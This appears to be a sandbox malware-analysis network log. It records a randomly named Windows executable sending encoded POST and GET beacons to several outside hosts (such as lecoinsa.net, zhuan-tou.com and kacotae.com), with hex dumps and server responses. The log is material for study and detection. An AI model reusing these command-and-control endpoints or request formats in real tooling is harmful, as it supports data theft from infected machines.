                                      Jun 10, 2024 10:23:03.747108936 CEST1236INData Raw: 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20
                                      Data Ascii: 3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-
                                      Jun 10, 2024 10:23:03.747142076 CEST636INData Raw: 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64
                                      Data Ascii: " y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                      Jun 10, 2024 10:23:03.747175932 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65
                                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" />
                                      Jun 10, 2024 10:23:03.747205019 CEST212INData Raw: 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20
                                      Data Ascii: .146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mi
                                      Jun 10, 2024 10:23:03.747237921 CEST1236INData Raw: 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: terlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /
                                      Jun 10, 2024 10:23:03.747272015 CEST212INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fil
                                      Jun 10, 2024 10:23:03.752317905 CEST1236INData Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45
                                      Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      36 | 192.168.2.5 | 51402 | 162.0.213.72 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:05.760710001 CEST | 454 | OUT | GET /fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:06.427530050 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:06 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      37 | 192.168.2.5 | 51403 | 217.116.0.191 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:11.656632900 CEST | 714 | OUT | POST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBI/8VUIkD73Pi9bqmx4NyPl7LJ8JdW4B8UjVZJD38FjKV0cqoKOd3eCqq9ndb6CA9tZCHwDN4NvdX2YAA0rFlS4R5fxFf1ONV5fRPYQ0xqlbI/jEG3PMxwJjGCk7m5iiB8rOjj2OB/D4Qfp8/l4a4tq9R4BQzuutwHqsp2c2rfkgf33ETvRD7z8snyf8=
                                      Jun 10, 2024 10:23:12.554663897 CEST | 598 | IN | HTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      38 | 192.168.2.5 | 51404 | 217.116.0.191 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:14.199444056 CEST | 734 | OUT | POST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wql8VClZIGL8IDKVsMqhOOc1eCXf9nRb6B89tcuHwTx5M/cx94ACp7FlS4R5f1U01OFV5OBPax0yiFa64jEG8vN2wJiVCl2z5nmB8q+jgiSCwD4WAZ9Dt4fR1L1A/zVt6I5KP8BDs++DMEMnnkMk+hiSpf8XsIqM4aL7sF8L+fcf7JYFsNBz
                                      Jun 10, 2024 10:23:15.082091093 CEST | 598 | IN | HTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:14 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      39 | 192.168.2.5 | 51405 | 217.116.0.191 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:16.728379011 CEST | 1751 | OUT | POST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wqt8V0RZHBf8JDKVgsqkOOdteCPb9nMs6Ew9t+mHnRV5F/cxyYAP0rEhS8N1fxw01OFV5NJPJA0yvlbI/jFH3PNSwIGFClyj5UeB8KujznOCvz4UDZ9bt5jK1L5M/yhL6PNKfLwv+Na1XUohjFYXiAX1gN0zhryj67nLp1cc/ONjp4QTt6t99QMioSFP1hh4kdEwn6/96+4RI+d0M2NAU/yqPzL+8+s56w1CBd0xAATu+ONdo+IfTPqFINgd/QdWJvNp67hRltKjbxwSnqRPpzuOkCID9iYoIWFS03vcWWsb2WOGbwobbGE5aAwO8+WKNa5LCjr8pbksPLdEdWUFGPDgZoq8hWmNO9ajM8ax+JQWWJf0AuJX/Vp70WV01XFx98Uly/1XFo2zS7YyLIwy6oeX5j5O61IjLu0iQm4hknxDISMgw7aSFifkXiW71a22MQNem7ehsu7x0dr4MI8LtWAoMcHxjXHIYf7QGKE+QOflrr9Il0mvxKmlt/KFytYGFenGjXL9f1c7In3+O2nTYenKJTdszEtNmHXg0xCVrfYLoxqHSoID1myjpcI57uGSCSVl7rMf2CWzvAzqvFE4dNhIkjjoTjjOG4BcWLO2iZiN19Cv1pKCg1PFw6yCsyerzaqdt6U/fHWjjeKvwf2++itq95qdJIDANwCWDfJbt1o1hxrhIIZZ8SvokER5+NCYAIk0docDG13yYKfDbCXC4eEdTmRk+WuuMMCVAH0G0DV67jRHxFpCkByvh/OjDfdv9ZNB5u60XRu975j0SVHsWv36gjOmXgYDE7ABi2vRB19SdauCxVbf96MPPh9memMx6LOJY8D0UPCxbgPO6y8znt5wwH3653YZI2/xen9t5vzlelY6RtwzxbBogS8Jzwjmu38hh/hftzPrRxQyiYTRpu1jQXECI2cLpTsW9E9Y4Rt72SxkdEhPkVNlqIxkgkXoXzuz [TRUNCATED]
                                      Jun 10, 2024 10:23:17.595701933 CEST | 598 | IN | HTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      40 | 192.168.2.5 | 51406 | 217.116.0.191 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:19.260036945 CEST | 455 | OUT | GET /xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:20.142914057 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 978
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==
                                      Origin-Agent-Cluster: ?0
                                      Age: 0
                                      X-Cache: MISS
                                      X-BKSrc: 0.6
                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ=='" /> <title>Redirecting to http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==">http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp
                                      Jun 10, 2024 10:23:20.142935991 CEST | 166 | IN
                                      Data Ascii: ;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==</a>. </body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      41 | 192.168.2.5 | 51407 | 103.120.80.111 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:25.926445961 CEST | 717 | OUT | POST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5ko0863AR3/Z47gjD6BwvKUARF9e/bkMATsYSavpjz+VaEHWzFDA2sD6DcmaSkgmeIsszGsZIQ3RHkLidI6A7RLTPnWZvPWduxkyy33BtVdbWKmgXmr45JV0tCg2/pHWPpxOqXVcSZ40QC7COh55Xc33G04m+HH0XOx1UJf+nJB6h2hfLBG4mQlfXz8Q=


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      42 | 192.168.2.5 | 51408 | 103.120.80.111 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:28.461127043 CEST | 737 | OUT | POST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbyUATMoSdupjgOVacXW2LjA5sD/0cnmSkk2eIpQzHfhLC3RFsrifFaA7RLTPnWNBPWFuwVCy2TViWdbRNmgXwb49JV1KCiSFpF+Pp0yqXEcdQ40SG7DWp5RYb3jprbnnGF8pCnY+T92PahWZmyX8Q2ZPKGPntrE6a7JzS6QUeAOq4/Zs1Jka


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      43 | 192.168.2.5 | 51409 | 103.120.80.111 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:31.120219946 CEST | 1754 | OUT | POST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbycAS+gSdNBjx+VaV3W3LjAgsDH4cnrpkm+eLPkzAuhLYnRFgLieI6AqRLDLnWdBPWFuwWayyHBiQdbWKmgLmr5aJV9wCiGVp0ePqUCqW20dMo0UIbDFp5MYb2PPrY7NGHspGB1/OuuWPxeKkRrWGRRcTAXtq7cpGIVqH9dUT03Yu+h96NVo/6C8t43/vbVBYjRr6zSRdvlL2hTpV2rnW0LzJk1MJv286qWSlz/RUhOSbCMgtG0uGN9Q6vicfD5LcFOTebhpv2y5uU1xHHvh0CBDDmBT6hDgVtV3bqL0GdMshe7FHv7Bgt6bqU6UxSRdmpSEBIuUx9PeBxCJJzVXIauxUcWeBs+N3HDzS78jKZVUYioOMAZM1s7ZAb5Yl0BnFI79Tm9xda+pkr+jlfnZpC0jrL1gNYsFfVrPFWkqcsL1DeksQ+X85fkcBc0i7w/iOh+NlNCkXVLPHgi2oOms6jq9MUHAPxjV2UEpNXaB7hEDk+cYg33zZPErvC3XmeZCj9BBj646QfctoD1DBEcb0PrZtzIJLEJyPQwkOFPqQbkKzAUJmOJqkeeIx5afJVKYhnJjeY4PtrgCng4zaRbjnUkVVbfr6WuDEsxnQvTQdF1TNPN6YhnbK2n8Etg18S1jxmkiwcp6fRKDUKfvI9zCrWk6w28vvlONDZyKLmoWiETzSLJnJ6bfSXNSbbMl5XzfbLVF6LpxhKWsnd1To5dIkERvL0fqtGXSRYrSOfkGCnulaCQN8P27ykxi7ntJWigb00ntMSMYds8oa6JEVAhXYillLaBh6KZkq/r94BhqunBrreL7xRHwXslixVrmAza/TomsF+MVC+24gyV0zuyCbnlD5MilBROz+B1cS4h64VT2UeeO8b44kvukI1sd/NX3vH9PC4kOOoQ9XHsrFUG50IX4YCVCNTvNOh2pb3yTZcMNHyEm+y+QPAlg7a/lCEEl9fpQ [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      44 | 192.168.2.5 | 51410 | 103.120.80.111 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:33.648906946 CEST | 456 | OUT | GET /lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:34.623193026 CEST | 1236 | IN | HTTP/1.1 200 OK
                                      Server: wts/1.7.0
                                      Date: Mon, 10 Jun 2024 08:23:44 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      ETag: "65517fce-1a10"
                                      Data Ascii: 1a29<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>zhuan-tou.com-(www.west.cn)</title> <meta name="description" content="zhuan-tou.com," /> <meta name="keywords" content="zhuan-tou.com," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                      Jun 10, 2024 10:23:34.623224020 CEST | 1236 | IN
                                      Data Ascii: { height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd,
                                      Jun 10, 2024 10:23:34.623235941 CEST | 1236 | IN
                                      Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
                                      Jun 10, 2024 10:23:34.623245001 CEST | 1236 | IN
                                      Data Ascii: font-size: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0;
                                      Jun 10, 2024 10:23:34.623255968 CEST | 1236 | IN
                                      Data Ascii: .footer-link span { padding: 0 6px; } </style></head><body> <div class="banner-out"> <div class="banner1"> <div class="wrap"> <h1>zhuan-tou.com</h1>
                                      Jun 10, 2024 10:23:34.623269081 CEST | 723 | IN
                                      Data Ascii: /services/mail/" target="_blank"></a> </div> </div> </div> <script> $(function() { $('#J_footerLink a').click(function() { var href = $(this).attr('href');


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      45 | 192.168.2.5 | 51411 | 64.226.69.42 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:39.857172012 CEST | 711 | OUT | POST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ETMruwulvEv7vwVsCAsn6hYbvLtuy6k1i3MYgOpU5YmRk+/446oIPX5/N1yCmZ2JL6v8EHFOVBqDhc42Tdz2UkBzbZhDWh43BWCshcybUoCB9jeVZNPQOkEpzKehHPnfS5AGvmeTUGbfAXbx2/qX3N4UlDBvDbxeHNf4Dtsca/0ZlaQDNtsIY+MK8LfUq/2dA05JWwo=
                                      Jun 10, 2024 10:23:40.669893980 CEST | 300 | IN | HTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:40 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      46 | 192.168.2.5 | 51412 | 64.226.69.42 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:42.389539957 CEST | 731 | OUT | POST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ETMruwulvEv7vQFsEjEntRYchrturqk5i3QYgKZ96rSRq/P457oIfH5/HVzJ7J2GL6z0ECFOVBWDhew2TuL5XUB1U5hBLx43BWCshcWxUpmB9SuVbvnTQUEq0KehUfnbS5A0vkq9UAffAVzx4NSQg94WojART54HKMf4GOV8NOc0gs9pXPkgLegysYXj7PX0aXp5In99P1HAlCbQwdAz4Oxvmclf
                                      Jun 10, 2024 10:23:43.211040020 CEST | 300 | IN | HTTP/1.1 404 Not Found
                                      Server: openresty
